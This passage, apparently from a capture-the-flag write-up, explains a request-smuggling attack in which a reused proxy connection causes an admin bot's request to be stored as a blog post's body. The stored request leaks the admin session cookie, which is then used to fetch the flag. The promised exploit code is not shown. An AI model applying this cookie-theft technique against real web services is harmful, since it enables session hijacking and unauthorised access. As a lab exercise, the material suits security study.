  • GET /admin/blogs/<blogID> with Cookie: session=<AdminSessionID> and User-Agent: AdminBot/1.0

Because the front proxy reuses upstream connections and routes the admin bot request into the same isolation bucket, the admin botโ€™s request bytes are consumed as the missing POST body. The backend then stores those bytes as the new blogโ€™s content. We fetch that blog and extract the admin session cookie from the captured headers, then call /flag with it.

Exploit code (end-to-end):

Last updated